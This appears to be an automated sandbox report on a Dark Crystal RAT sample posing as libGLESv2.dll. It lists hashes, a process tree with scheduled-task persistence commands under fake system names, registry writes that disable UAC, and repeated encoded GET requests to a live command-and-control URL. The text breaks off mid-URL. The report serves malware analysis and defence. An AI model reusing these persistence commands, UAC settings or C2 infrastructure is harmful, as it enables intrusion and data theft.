File name: | 2021A9779C45F35A46B1B28F2E9136FA.exe |
Full analysis: | https://app.any.run/tasks/5e519561-0f7b-4ec0-bc0d-9630c5df98d2 |
Verdict: | Malicious activity |
Threats: | DCrat, also known as Dark Crystal RAT, is a remote access trojan (RAT), which was first introduced in 2018. It is a modular malware that can be customized to perform different tasks. For instance, it can steal passwords, crypto wallet information, hijack Telegram and Steam accounts, and more. Attackers may use a variety of methods to distribute DCrat, but phishing email campaigns are the most common. |
Analysis date: | December 13, 2024, 22:09:12 |
OS: | Windows 10 Professional (build: 19045, 64 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.microsoft.portable-executable |
File info: | PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, 4 sections |
MD5: | 2021A9779C45F35A46B1B28F2E9136FA |
SHA1: | 76E03DFCC8732388FAD4FD83B72B34CAD50786CA |
SHA256: | C8EA81EC0AFA16E1E7C0BC325396BE024C993479765A9E4AD26B29D83BBFB01A |
SSDEEP: | 98304:tsCgQ0u3uVWrO/+aJIHXhEtG8vb4dtcgV7qS5+s2e3okdXxqM4Dxz33txV8Pe4fs:aGa |
.exe | | | Generic CIL Executable (.NET, Mono, etc.) (45.1) |
---|---|---|
.exe | | | Win32 Executable MS Visual C++ (generic) (19.2) |
.exe | | | Win64 Executable (generic) (17) |
.scr | | | Windows screen saver (8) |
.dll | | | Win32 Dynamic Link Library (generic) (4) |
ProductVersion: | 5.15.2.0 |
---|---|
ProductName: | libGLESv2 |
OriginalFileName: | libGLESv2.dll |
FileVersion: | 5.15.2.0 |
CharacterSet: | Unicode |
LanguageCode: | English (U.S.) |
FileSubtype: | - |
ObjectFileType: | Dynamic link library |
FileOS: | Win32 |
FileFlags: | (none) |
FileFlagsMask: | 0x003f |
ProductVersionNumber: | 5.15.2.0 |
FileVersionNumber: | 5.15.2.0 |
Subsystem: | Windows GUI |
SubsystemVersion: | 4 |
ImageVersion: | - |
OSVersion: | 4 |
EntryPoint: | 0x2c2cae |
UninitializedDataSize: | - |
InitializedDataSize: | 13824 |
CodeSize: | 2887168 |
LinkerVersion: | 6 |
PEType: | PE32 |
ImageFileCharacteristics: | Executable, No line numbers, No symbols, Large address aware, 32-bit |
TimeStamp: | 2022:05:04 16:03:35+00:00 |
MachineType: | Intel 386 or later, and compatibles |
PID | CMD | Path | Indicators | Parent process | |||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
5532 | "C:\Users\admin\Desktop\2021A9779C45F35A46B1B28F2E9136FA.exe" | C:\Users\admin\Desktop\2021A9779C45F35A46B1B28F2E9136FA.exe | — | explorer.exe | |||||||||||
User: admin Integrity Level: MEDIUM Exit code: 0 Version: 5.15.2.0 Modules
| |||||||||||||||
4136 | "C:\Windows\System32\cmd.exe" /c "C:\Users\admin\Desktop\2021A9779C45F35A46B1B28F2E9136FA.exe" | C:\Windows\System32\cmd.exe | 2021A9779C45F35A46B1B28F2E9136FA.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
5592 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
624 | C:\Users\admin\Desktop\2021A9779C45F35A46B1B28F2E9136FA.exe | C:\Users\admin\Desktop\2021A9779C45F35A46B1B28F2E9136FA.exe | cmd.exe | ||||||||||||
User: admin Integrity Level: HIGH Exit code: 0 Version: 5.15.2.0 Modules
| |||||||||||||||
1556 | "C:\WINDOWS\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca | C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe | — | svchost.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Shell Experience Host Version: 10.0.19041.3758 (WinBuild.160101.0800) Modules
| |||||||||||||||
4024 | schtasks.exe /create /tn "ctfmonc" /sc MINUTE /mo 8 /tr "'C:\Program Files\Microsoft Update Health Tools\ctfmon.exe'" /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Task Scheduler Configuration Tool Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
1864 | schtasks.exe /create /tn "ctfmon" /sc ONLOGON /tr "'C:\Program Files\Microsoft Update Health Tools\ctfmon.exe'" /rl HIGHEST /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Task Scheduler Configuration Tool Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
1020 | schtasks.exe /create /tn "ctfmonc" /sc MINUTE /mo 6 /tr "'C:\Program Files\Microsoft Update Health Tools\ctfmon.exe'" /rl HIGHEST /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Task Scheduler Configuration Tool Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
2076 | schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Windows Mail\en-US\RuntimeBroker.exe'" /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Task Scheduler Configuration Tool Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
2624 | schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Mail\en-US\RuntimeBroker.exe'" /rl HIGHEST /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Task Scheduler Configuration Tool Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
|
(PID) Process: | (624) 2021A9779C45F35A46B1B28F2E9136FA.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System |
Operation: | write | Name: | EnableLUA |
Value: 0 | |||
(PID) Process: | (624) 2021A9779C45F35A46B1B28F2E9136FA.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System |
Operation: | write | Name: | ConsentPromptBehaviorAdmin |
Value: 0 | |||
(PID) Process: | (624) 2021A9779C45F35A46B1B28F2E9136FA.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System |
Operation: | write | Name: | PromptOnSecureDesktop |
Value: 0 | |||
(PID) Process: | (624) 2021A9779C45F35A46B1B28F2E9136FA.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Action Center\Checks\{C8E6F269-B90A-4053-A3BE-499AFCEC98C4}.check.0 |
Operation: | write | Name: | CheckSetting |
Value: 23004100430042006C006F00620000000000000000000000010000000000000000000000 | |||
(PID) Process: | (1556) ShellExperienceHost.exe | Key: | \REGISTRY\A\{f60ee479-ad51-dad5-a5da-ae1e5770d7dc}\LocalState |
Operation: | write | Name: | PeekBadges |
Value: 5B005D000000C9C92AABAB4DDB01 | |||
(PID) Process: | (624) 2021A9779C45F35A46B1B28F2E9136FA.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\6f5c2ffe07cbc300d0e5f63f7e52eae8b6467c96 |
Operation: | write | Name: | 216cd6b821d4c87acb3539cdf854d1776d083d5e |
Value: WyJDOlxcVXNlcnNcXGFkbWluXFxEZXNrdG9wXFwyMDIxQTk3NzlDNDVGMzVBNDZCMUIyOEYyRTkxMzZGQS5leGUiLCJDOlxcUHJvZ3JhbSBGaWxlc1xcTWljcm9zb2Z0IFVwZGF0ZSBIZWFsdGggVG9vbHNcXGN0Zm1vbi5leGUiLCJDOlxcUHJvZ3JhbSBGaWxlcyAoeDg2KVxcV2luZG93cyBNYWlsXFxlbi1VU1xcUnVudGltZUJyb2tlci5leGUiXQ== | |||
(PID) Process: | (624) 2021A9779C45F35A46B1B28F2E9136FA.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\MuiCache |
Operation: | write | Name: | C:\WINDOWS\System32\cmd.exe.FriendlyAppName |
Value: Windows Command Processor | |||
(PID) Process: | (624) 2021A9779C45F35A46B1B28F2E9136FA.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\MuiCache |
Operation: | write | Name: | C:\WINDOWS\System32\cmd.exe.ApplicationCompany |
Value: Microsoft Corporation | |||
(PID) Process: | (7012) RuntimeBroker.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System |
Operation: | write | Name: | EnableLUA |
Value: 0 | |||
(PID) Process: | (7012) RuntimeBroker.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System |
Operation: | write | Name: | ConsentPromptBehaviorAdmin |
Value: 0 |
PID | Process | Filename | Type | |
---|---|---|---|---|
6012 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary | |
MD5:96D5FE8D8C7FC738D8ACCC74B708715B | SHA256:934E6F3BD4B8501710668715072E3B59BB1D0B749374EF516930C6FA14F1C1A3 | |||
6012 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_a4n1z3y1.1uv.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
2428 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_1wmyhhul.qrz.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
2008 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_rlckgphk.g1t.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
2008 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_atnlugro.jte.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
2428 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_cbzfile2.glu.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
624 | 2021A9779C45F35A46B1B28F2E9136FA.exe | C:\Program Files (x86)\Windows Mail\en-US\9e8d7a4ca61bd9 | text | |
MD5:97FE7C22AC21F7188552006F20581E39 | SHA256:4C3B08A2B4D3BC958F3157C19201D801CDE4825662C2260E41A3426252D05559 | |||
624 | 2021A9779C45F35A46B1B28F2E9136FA.exe | C:\Users\admin\AppData\Local\Temp\Uzn3pTPzl7 | text | |
MD5:8480AB92A7E656D57830985285BEF9AA | SHA256:C22D162C1223967330FE429B9ADFBB49C170996801455905879083A18AAEA568 | |||
7012 | RuntimeBroker.exe | C:\Users\admin\AppData\Local\Temp\34d4fd16970878e4a300e87d30b20c449946af98.exe | executable | |
MD5:2021A9779C45F35A46B1B28F2E9136FA | SHA256:C8EA81EC0AFA16E1E7C0BC325396BE024C993479765A9E4AD26B29D83BBFB01A | |||
7012 | RuntimeBroker.exe | C:\Users\admin\AppData\Local\Temp\035d2b99-abdc-4586-8391-17cf7e69cd70.vbs | text | |
MD5:D145E553670E184BE50E9F9DBAC5AB10 | SHA256:6D1E7A9CDE9C9FF8A42A53F081E98958FDEF486B0390179D7B013CB9A897F1D8 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
7012 | RuntimeBroker.exe | GET | 200 | 172.67.194.232:80 | http://kotoswin.darkproducts.ru/L1nc0In.php?b89Tec8tEKm3H=hIzF5oMNqkmhUYKd3&iKDv=nKw2Pi9TRo&0a4b3e0abde6088f3a4eb375c6a13c54=wM0U2M5ADOzY2Y0EmYkhDOkNjMkVTZwETN1ATN4QjNxIWY1YGMhN2Y1QjNwIjM1ETNyADOxkjM&646acf5d6c8b1a7fc193c9ecad426d3d=gN3MDOkVWNiBjM2IDMhJTN2MWOwgDNjRzNzAjM2IDOzMzYhRGZxQWM&543e251a8931e4d89f708366c523c31c=0VfiIiOiMWZ1QWO4cjM0gjY2UTYlRTOjJWNiRDZlFGOyYGNmVjNiwiIidTO5YmZzYmY2QmY1cDZxQDOhhzYxMmMmNWM1EjMlRWN3gDZjlDNlJiOiUjNzcTOhNmY2cTNwQDNmVWNxIGZjVWO5MzM1AzN4YmMiwiI4kjZhZDN5kDN0MGMyIGMzQ2N4UGMwMTY0UGO3gDM3kjNxQmZ0QGNzIiOiQGNygTO4cTMlBjY5UjM4UzYwMDN0YWZjVDMyIGM1IGNis3W | unknown | — | — | malicious |
4712 | MoUsoCoreWorker.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
7012 | RuntimeBroker.exe | GET | — | 172.67.194.232:80 | http://kotoswin.darkproducts.ru/L1nc0In.php?b89Tec8tEKm3H=hIzF5oMNqkmhUYKd3&iKDv=nKw2Pi9TRo&0a4b3e0abde6088f3a4eb375c6a13c54=wM0U2M5ADOzY2Y0EmYkhDOkNjMkVTZwETN1ATN4QjNxIWY1YGMhN2Y1QjNwIjM1ETNyADOxkjM&646acf5d6c8b1a7fc193c9ecad426d3d=gN3MDOkVWNiBjM2IDMhJTN2MWOwgDNjRzNzAjM2IDOzMzYhRGZxQWM&543e251a8931e4d89f708366c523c31c=0VfiIiOiMWZ1QWO4cjM0gjY2UTYlRTOjJWNiRDZlFGOyYGNmVjNiwiIlZmM4kjNjNGZiJDMlBDNzAjY1I2N1IzMmRTY5kTOhdDMmJTYwEDZzIiOiUjNzcTOhNmY2cTNwQDNmVWNxIGZjVWO5MzM1AzN4YmMiwiI4kjZhZDN5kDN0MGMyIGMzQ2N4UGMwMTY0UGO3gDM3kjNxQmZ0QGNzIiOiQGNygTO4cTMlBjY5UjM4UzYwMDN0YWZjVDMyIGM1IGNis3W | unknown | — | — | malicious |
2160 | svchost.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
7012 | RuntimeBroker.exe | GET | 200 | 172.67.194.232:80 | http://kotoswin.darkproducts.ru/L1nc0In.php?b89Tec8tEKm3H=hIzF5oMNqkmhUYKd3&iKDv=nKw2Pi9TRo&0a4b3e0abde6088f3a4eb375c6a13c54=wM0U2M5ADOzY2Y0EmYkhDOkNjMkVTZwETN1ATN4QjNxIWY1YGMhN2Y1QjNwIjM1ETNyADOxkjM&646acf5d6c8b1a7fc193c9ecad426d3d=gN3MDOkVWNiBjM2IDMhJTN2MWOwgDNjRzNzAjM2IDOzMzYhRGZxQWM&8e9e2ba1c0140a5dcf9b62f8d6f73d2c=d1nIwYkWsJlbjhmUzM2Z0cVYuZFSiFlQTx0ZwUUVn1keNZzaE1kNBRVTnFlaNdXS6xkeFpHT5VkeXJiOiMWZ1QWO4cjM0gjY2UTYlRTOjJWNiRDZlFGOyYGNmVjNiwiIidTO5YmZzYmY2QmY1cDZxQDOhhzYxMmMmNWM1EjMlRWN3gDZjlDNlJiOiUjNzcTOhNmY2cTNwQDNmVWNxIGZjVWO5MzM1AzN4YmMiwiI4kjZhZDN5kDN0MGMyIGMzQ2N4UGMwMTY0UGO3gDM3kjNxQmZ0QGNzIiOiQGNygTO4cTMlBjY5UjM4UzYwMDN0YWZjVDMyIGM1IGNis3W | unknown | — | — | malicious |
7012 | RuntimeBroker.exe | GET | 200 | 172.67.194.232:80 | http://kotoswin.darkproducts.ru/L1nc0In.php?b89Tec8tEKm3H=hIzF5oMNqkmhUYKd3&iKDv=nKw2Pi9TRo&0a4b3e0abde6088f3a4eb375c6a13c54=wM0U2M5ADOzY2Y0EmYkhDOkNjMkVTZwETN1ATN4QjNxIWY1YGMhN2Y1QjNwIjM1ETNyADOxkjM&646acf5d6c8b1a7fc193c9ecad426d3d=gN3MDOkVWNiBjM2IDMhJTN2MWOwgDNjRzNzAjM2IDOzMzYhRGZxQWM&02630fec14d4acf093b4aa6b04be05a1=d1nIlNWZkBzN0QmZ0QDOmlTYkJWY2cjYhRTYjRjNhZTYyYDN5YzMiVGO0IiOiUjNzcTOhNmY2cTNwQDNmVWNxIGZjVWO5MzM1AzN4YmMiwiI4kjZhZDN5kDN0MGMyIGMzQ2N4UGMwMTY0UGO3gDM3kjNxQmZ0QGNzIiOiQGNygTO4cTMlBjY5UjM4UzYwMDN0YWZjVDMyIGM1IGNis3W&543e251a8931e4d89f708366c523c31c=QX9JiI6IyYlVDZ5gzNyQDOiZTNhVGN5MmY1IGNkVWY4IjZ0YWN2ICLiU2YlRGM3QDZmRDN4YWOhRmYhZzNiFGNhNGN2EmNhJjN0kjNzIWZ4QjI6ISN2MzN5E2YiZzN1ADN0YWZ1EjYkNWZ5kzMzUDM3gjZyICLigTOmFmN0kTO0QzYwIjYwMDZ3gTZwAzMhRTZ4cDOwcTO2EDZmRDZ0MjI6ICZ0IDO5gzNxUGMilTNygTNjBzM0QjZlNWNwIjYwUjY0Iyes0nIRZWOKlHUp9maJBTSy4EbKJTWsZkeZFTTq50djRkW1UkeZlGaqp1aSpmTt5EVNpXVt1UMFpnTyUERP1Ga65ENJNETp1EWidWQqlkNJN0T0UlaZ1mSE5keJJTWsZkeOlmTq10aS1mTo50RahXWUp1akRlWrpVbZpmWUp1djpmWwk0Ral2cu9UaFdEZoJVRkRjVtl0cVp2TpFFWkZnVXJGcSZ0YsZ1RiRlSDxUaV1GZwJ1MZJkSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarlXTnNWbiBnQINGbSNTVnFFVNd2dXp1a5cFVnlFRJVDeXFGdG1mUnFlaOVUMVF1bBlWZJRWRNNDNp10ZBVUSWJUMRdWQE1EMZRFTxs2RJBHMFZ1bV12Y25URJBXSGt0cWdEZ1x2aJZTSTpFdG1GVWJUMRl2dplEcJVUS3d2QJlnVHR2dGdkWCJ0UlhGeHNmesdkUn10VhpnRtF1ZR5mW250MilnTXFmTKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJZnUuJmdKNjYVlzUZpGbtNGbxcVUp9maJxWNyImNWdlYwJlbJNXSD10dBRUT3FkaJZTSDJGaSNzY2JkbJNXSTl1aG1mYo5URJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWSzEFROJDN510MwMETzkERPBDNT5EMJl2Tp1kMiNnSDxUaFBTUp9maJVjSIRWdWNjYqp0QMlWTXpVaWdFZSpUaPlGNyIGckdlW5p0QMl2dXlFbKhEZ1lzVUl2bqlUNShVYqp0QMlWVE5Ee0MUTxUkaMVTVU1UdrpmTp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS1x2VitmRtlkNJNlW0ZUbUlnVyMmVKNETpFVRUtEeFRFSwVFTRlTRWxkTWJVRKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiMWZ1QWO4cjM0gjY2UTYlRTOjJWNiRDZlFGOyYGNmVjNiwiImR2Y2QjNiF2NwMmZlhTY0ADOxEDZmVTN1cTN2EWYycTYwYTYhJGMlJiOiUjNzcTOhNmY2cTNwQDNmVWNxIGZjVWO5MzM1AzN4YmMiwiI4kjZhZDN5kDN0MGMyIGMzQ2N4UGMwMTY0UGO3gDM3kjNxQmZ0QGNzIiOiQGNygTO4cTMlBjY5UjM4UzYwMDN0YWZjVDMyIGM1IGNis3W | unknown | — | — | malicious |
7012 | RuntimeBroker.exe | GET | 200 | 172.67.194.232:80 | http://kotoswin.darkproducts.ru/L1nc0In.php?b89Tec8tEKm3H=hIzF5oMNqkmhUYKd3&iKDv=nKw2Pi9TRo&0a4b3e0abde6088f3a4eb375c6a13c54=wM0U2M5ADOzY2Y0EmYkhDOkNjMkVTZwETN1ATN4QjNxIWY1YGMhN2Y1QjNwIjM1ETNyADOxkjM&646acf5d6c8b1a7fc193c9ecad426d3d=gN3MDOkVWNiBjM2IDMhJTN2MWOwgDNjRzNzAjM2IDOzMzYhRGZxQWM&02630fec14d4acf093b4aa6b04be05a1=d1nIlNWZkBzN0QmZ0QDOmlTYkJWY2cjYhRTYjRjNhZTYyYDN5YzMiVGO0IiOiUjNzcTOhNmY2cTNwQDNmVWNxIGZjVWO5MzM1AzN4YmMiwiI4kjZhZDN5kDN0MGMyIGMzQ2N4UGMwMTY0UGO3gDM3kjNxQmZ0QGNzIiOiQGNygTO4cTMlBjY5UjM4UzYwMDN0YWZjVDMyIGM1IGNis3W&543e251a8931e4d89f708366c523c31c=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 | unknown | — | — | malicious |
7012 | RuntimeBroker.exe | GET | 200 | 172.67.194.232:80 | http://kotoswin.darkproducts.ru/L1nc0In.php?b89Tec8tEKm3H=hIzF5oMNqkmhUYKd3&iKDv=nKw2Pi9TRo&0a4b3e0abde6088f3a4eb375c6a13c54=wM0U2M5ADOzY2Y0EmYkhDOkNjMkVTZwETN1ATN4QjNxIWY1YGMhN2Y1QjNwIjM1ETNyADOxkjM&646acf5d6c8b1a7fc193c9ecad426d3d=gN3MDOkVWNiBjM2IDMhJTN2MWOwgDNjRzNzAjM2IDOzMzYhRGZxQWM&02630fec14d4acf093b4aa6b04be05a1=d1nIlNWZkBzN0QmZ0QDOmlTYkJWY2cjYhRTYjRjNhZTYyYDN5YzMiVGO0IiOiUjNzcTOhNmY2cTNwQDNmVWNxIGZjVWO5MzM1AzN4YmMiwiI4kjZhZDN5kDN0MGMyIGMzQ2N4UGMwMTY0UGO3gDM3kjNxQmZ0QGNzIiOiQGNygTO4cTMlBjY5UjM4UzYwMDN0YWZjVDMyIGM1IGNis3W&543e251a8931e4d89f708366c523c31c=0VfiIiOiMWZ1QWO4cjM0gjY2UTYlRTOjJWNiRDZlFGOyYGNmVjNiwiIlNWZkBzN0QmZ0QDOmlTYkJWY2cjYhRTYjRjNhZTYyYDN5YzMiVGO0IiOiUjNzcTOhNmY2cTNwQDNmVWNxIGZjVWO5MzM1AzN4YmMiwiI4kjZhZDN5kDN0MGMyIGMzQ2N4UGMwMTY0UGO3gDM3kjNxQmZ0QGNzIiOiQGNygTO4cTMlBjY5UjM4UzYwMDN0YWZjVDMyIGM1IGNisHL9JCMYZWanpWT2UkaNZTQE1UavpWStpleONTUE9EbGRlTzUleNJTTy0UNVRlWpJVbZhXUq5ENRJjT0UkMOtmRtlFaKdVWsp1RapXSDxUaVN0T6lUaPl2aE1EeZR1TppEVNtmRt50MjpWT4tGROhXUE5EbSpnT00keNpXQq5UbOJTT3FFRNNTSU1UbCpWSzl0UKpXSp9UaR1mT0k1RNlmWU1UaGdVW4V1VNVTVqllaWdlT5V1RPdXQU1kMVpnTqZ1RNhmUUlVNJ1WWtplaJNXSTpENJl2TpFEVOBTRq5kMRpmT4tGRaBTTE1UaaJTTyk1RORTVE90aspXW4l1ROdXRXlVbaRlWxkFRPFTTql0cJlHUp9maJBTSy4EbKJTWsZkeZFTTq50djRkW1UkeZlGaqp1aSpmTt5EVNpXVt1UMFpnTyUERP1Ga65ENJNETp1EWidWQqlkNJN0T0UlaZ1mSE5keJJTWsZkeOlmTq10aS1mTo50RahXWUp1akRlWrpVbZpmWUp1djpmWwk0Ral2cu9UaFdEZoJVRkRjVtl0cVp2TpFFWkZnVXJGcSZ0YsZ1RiRlSDxUaV1GZwJ1MZJkSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarlXTnNWbiBnQINGbSNTVnFFVNd2dXp1a5cFVnlFRJVDeXFGdG1mUnFlaOVUMVF1bBlWZJRWRNNDNp10ZBVUSWJUMRdWQE1EMZRFTxs2RJBHMFZ1bV12Y25URJBXSGt0cWdEZ1x2aJZTSTpFdG1GVWJUMRl2dplEcJVUS3d2QJlnVHR2dGdkWCJ0UlhGeHNmesdkUn10VhpnRtF1ZR5mW250MilnTXFmTKl2TpV1VihWNVZVUktW